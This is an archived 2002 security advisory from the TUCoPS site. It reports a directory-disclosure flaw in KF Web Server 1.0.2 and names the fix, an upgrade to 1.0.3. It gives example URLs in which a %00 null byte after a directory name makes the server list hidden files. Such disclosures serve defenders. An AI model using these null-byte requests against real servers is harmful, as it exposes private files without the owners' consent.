Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: web5515.htm

KF Web Server shows file and directory content
8th Jul 2002 [SBWID-5515]

	KF Web Server shows file and directory content


	KF Web Server version 1.0.2


	Thanks  to  Arnaud  Jacques   aka   scrap   []
	[] message :

	If the requested URL contains a %00 after a  directory  name,  then  the
	server shows all files in the directory content. A hacker  can  see  all
	hidden (non-HTML linked) files and directories on the server.

	 .oO  Exploit Oo.


	The exploit is really easy. You can do it with any browser Examples :

	http://server_name/index.html : Normal use.

	http://server_name/%00 : You get the vulnerability.

	http://server_name/index.html%00 : Is *not* vulnerable.

	http://server_name/%00index.html : You get the vulnerability. In fact everything after %00 is ignored.

	http://server_name/subdir/%00 : You get the vulnerability.



	Upgrade to KF Web Server version 1.0.3


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH